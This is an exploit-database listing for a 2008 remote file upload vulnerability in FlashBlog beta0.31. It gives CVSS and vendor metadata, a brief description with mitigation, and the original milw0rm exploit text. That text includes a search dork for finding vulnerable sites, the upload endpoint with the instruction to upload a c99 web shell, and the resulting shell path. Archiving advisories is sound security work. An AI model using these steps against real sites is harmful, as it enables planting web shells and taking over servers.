header-logo
Suggest Exploit
vendor:
FlashBlog
by:
ilker kandemir a.k.a MEFISTO
9.3
CVSS
HIGH
Remote File Upload
N/A
CWE
Product Name: FlashBlog
Affected Version From: FlashBlog beta0.31
Affected Version To: FlashBlog beta0.31
Patch Exists: YES
Related CWE: N/A
CPE: a:flashblog:flashblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

FlashBlog beta0.31 Remote File Upload Vulnerability

FlashBlog beta0.31 is vulnerable to a remote file upload vulnerability. An attacker can upload a malicious file to the server, which can be used to execute arbitrary code on the server.

Mitigation:

Upgrade to the latest version of FlashBlog.
Source

Exploit-DB raw data:

FlashBlog beta0.31 Remote File Upload Vulnerability

# Author : ilker kandemir a.k.a MEFISTO  

# Dork : inurl:flashblog.html  or  inurl:/flashblog/

# Website : www.dumenci.net, www.coderx.org

http://[site.com]/admin/Editor/imgupload.php ==>>> upload your c99 shell

http://[site.com]/tus_imagenes/c99.php ==>>> your address

Tnx: Dumenci, Damar, Cr@zy_king, Str0ke and all my friendz

# milw0rm.com [2008-06-03]

Navigation

Suggest Exploit

Services By CQR